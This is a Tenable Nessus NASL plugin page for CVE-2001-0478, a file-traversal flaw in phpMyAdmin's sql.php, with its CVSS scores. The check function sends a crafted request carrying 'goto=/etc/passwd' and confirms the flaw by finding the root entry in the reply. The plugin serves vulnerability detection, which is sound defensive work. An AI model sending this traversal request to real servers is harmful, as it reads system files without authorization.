CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
EPSS
Percentile
87.5%
It is possible to make the remote phpMyAdmin installation read arbitrary data on the remote host. An attacker may use this flaw to read arbitrary files that your web server has the right to access or execute arbitrary PHP code.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
#
# Ref: http://www.securereality.com.au/archives/sradv00008.txt
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(11116);
script_version("1.29");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2001-0478");
script_bugtraq_id(2642);
script_name(english:"phpMyAdmin sql.php Traversal Arbitrary File Access");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that is affected by a
local file inclusion flaw.");
script_set_attribute(attribute:"description", value:
"It is possible to make the remote phpMyAdmin installation read
arbitrary data on the remote host. An attacker may use this flaw to
read arbitrary files that your web server has the right to access or
execute arbitrary PHP code.");
# https://web.archive.org/web/20020713150446/http://archives.neohapsis.com/archives/bugtraq/2001-04/0396.html
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?769b91eb");
script_set_attribute(attribute:"solution", value:
"Upgrade to phpMyAdmin 2.2.1 or newer");
script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"vuln_publication_date", value:"2001/07/02");
script_set_attribute(attribute:"plugin_publication_date", value:"2002/09/04");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:phpmyadmin:phpmyadmin");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2002-2022 Tenable Network Security, Inc.");
script_dependencies("phpMyAdmin_detect.nasl");
script_require_keys("www/phpMyAdmin", "www/PHP");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
exit(0);
}
#
# The script code starts here
#
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
port = get_http_port(default:80, php:TRUE);
function check(dir, file)
{
local_var r;
r = http_send_recv3(method:"GET",item:string(dir, "/", file, "?server=000&cfgServers[000][host]=hello&btnDrop=No&goto=/etc/passwd"),
port:port, exit_on_fail:TRUE);
if(egrep(pattern:".*root:.*:.*:0:[01]:.*", string:r[2]))
{
security_warning(port);
exit(0);
}
}
# Test an install.
install = get_kb_item(string("www/", port, "/phpMyAdmin"));
if (isnull(install)) exit(0);
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!isnull(matches))
{
dir = matches[2];
check(dir:dir, file:"sql.php");
check(dir:dir, file:"sql.php3");
}